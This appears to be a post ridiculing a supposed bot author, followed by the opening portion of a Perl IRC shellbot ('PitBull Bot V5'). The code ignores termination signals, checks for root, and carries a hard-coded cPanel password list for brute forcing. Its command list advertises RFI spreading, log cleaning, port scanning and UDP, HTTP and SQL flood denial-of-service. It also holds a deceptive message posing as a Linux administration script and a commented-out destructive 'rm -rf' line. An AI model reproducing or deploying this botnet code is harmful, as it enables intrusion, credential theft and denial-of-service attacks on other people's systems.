This is fubar the ngrBot creator “made from scratch”
#!/usr/bin/perl #system 'cd /tmp;rm -rf *'; # # PitBull Bot V5 PRiVaTE Sh3llBoT # # Last edited : 25/2/2008 # #[@[PitBull Bot V5 Commands List]@] #[@-----[Shellbot/Hacking Based]-----@] #!bot @admins #!bot @spread <rfi> #!bot @milw0rm #!bot @packetstorm #!bot @portscan <host> #!bot @logcleaner #!bot @md5 <hash> #!bot @sendmail <subject> <sender> <recipient> <message> #!bot @vnc <B-Class> #!bot @boxip #!bot @socks5 #!bot @cleartmp #!bot @portchk <host> <port> #!bot @proxy <a|t|e> #!bot @rootable #!bot @modules #!bot @cpanel <host> <user> <port> #!bot @visit <url> #!bot @shellfind <c99/r57/mys/phm/rem> #[@-----[IRC Based]-----@] #!bot @join <#channel> #!bot @part <#channel> #!bot @quit <reason> #!bot @voice <who> #!bot @devoice <who> #!bot @halfop <who> #!bot @dehalfop <who> #!bot @op <who> #!bot @deop <who> #!bot @owner <who> #!bot @deowner <who> #[@-----[DDos Based]-----@] #!bot @udpflood <host> <packetsize> <time> #!bot @httpflood <host> <time> #!bot @sqlflood <host> <time> #[@-----[Flooding Based]-----@] #!bot @msgflood <who> #!bot @dccflood <who> #!bot @ctcpflood <who> #!bot @noticeflood <who> #!bot @channelflood #!bot @maxiflood <who> #[@[PitBull Bot V5 Commands List]@] # # Sh3llBoT # ###################### #print " After installation, Linux requires configuration and systems administration. Corporate systems need monitoring, backups, updates, as well as system and user management. Ubuntu (apt), CentOS, Fedora and Red Hat (rpm/YUM) server and desktop systems adminstration are covered by this script. Please dont exit the script or it will result in a broken linux partition"; ###################### # Specify your data: #--------------------------------------------------------------# my $max_lines= '10'; my $sleeping= '3'; my $prefix = "f"; # "!" is included :) my $spread = ""; my @admins = ("fubar"); my @hostauth= (""); #--------------------------------------------------------------# $server= '' unless $server; my $port= '1776'; my @channel= ("#rfi#"); my @nickname = ("fub0t|"); my $nick = $nickname[rand scalar @nickname]; my $ircname = 'fub0t'; chop (my $realname = "fub0t'); #--------------------------------------------------------------# my $httpmodule; my $usermodule; my $lwpmodule; my $filemodule; #--------------------------------------------------------------# my @cpanelpasswds = ("1","12","967qeikt","123","1234","12345","123456","1234567","12345678","123456789","1234567890","admin","root", "pass","passwd","password","Pass","Passwd","PassWd","PassWord","pwd","login","Admin","admin","test","123123","1212", "12341234","zxcvbnm","zxcvbn","zxcvb","zxcv","zxc","q1w2e3r4","q1w2e3","q1w2e3r4t5","1q2w3e4r5t","1q2w3e4r","1q2w3e", "demo","morgan","ferrari","italia","usa","clinton","dart","call","asdf","asdfg","asdfgh","qazwsx","qazxsw","qwertyu", "qwertyuiop","qwertyuio","qwertyu","qwerty","qwert","qwer","james","hosting","temp","test1","test12","test123","tester", "testing","cpanel","default","Login","admin.","cpanels","web","master","webmaster","dark","support","darby","mail", "dick","mary","evil","nissan","toyota","kingkong","superman","super","supra","data","service","server","weed","abc", "abc123","hello","terror","binladen","europe","website","mypass","pass1","pass12","pass123","pass1234","passwd1"); #--------------------------------------------------------------# # End here :) $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; eval "use HTTP::Request;"; if ($@) { $httpmodule= "4No"; } else{ $httpmodule= "4Yes"; } eval "use LWP::UserAgent;"; if ($@) { $usermodule= "4No"; } else{ $usermodule= "4Yes"; } eval "require LWP;"; if ($@) { $lwpmodule= "4No"; } else{ $lwpmodule= "4Yes"; } eval "use FileHandle;"; if ($@) { $filemodule= "4No"; } else{ $filemodule= "4Yes"; } use IO::Socket; use Socket; use IO::Select; chdir("/"); #Connect $server="$ARGV[0]" if $ARGV[0]; # Real psx! - by xeQt. my $uid=`id -u`; if ($uid =~ /^0$/) { $0=$xeQters."